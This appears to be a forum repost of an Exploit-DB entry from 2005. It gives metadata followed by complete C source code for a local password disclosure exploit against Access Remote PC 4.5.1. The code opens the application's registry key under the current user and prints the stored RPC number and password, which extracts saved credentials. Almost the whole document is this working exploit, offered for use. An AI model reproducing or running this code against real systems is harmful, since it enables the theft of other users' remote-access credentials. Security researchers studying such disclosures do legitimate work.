- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1086
- Проверка EDB
-
- Пройдено
- Автор
- KOZAN
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2005-07-04
C:
/*****************************************************************
Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan
Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com
Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#define BUF 100
int main()
{
HKEY hKey;
char RPCNumber[BUF], Password[BUF];
DWORD dwBuf = BUF;
if( RegOpenKeyEx( HKEY_CURRENT_USER,
"Software\\Access Remote PC\\Client\\Options\\Proxy",
0,
KEY_QUERY_VALUE,
&hKey
) !=ERROR_SUCCESS )
{
fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
return -1;
}
if( RegQueryValueEx( hKey,
"RPCNumber",
NULL,
NULL,
(BYTE *)&RPCNumber,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( RPCNumber,"Not Found!\n" );
if( RegQueryValueEx( hKey,
"Password",
NULL,
NULL,
(BYTE *)&Password,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( Password,"Not Found!\n" );
fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
fprintf( stdout, "Credits to AtmaCA\n" );
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
fprintf( stdout, "[email protected]\n\n" );
fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
fprintf( stdout, "Password\t: %s\n", Password );
return 0;
}
// milw0rm.com [2005-07-04]- Источник
- www.exploit-db.com
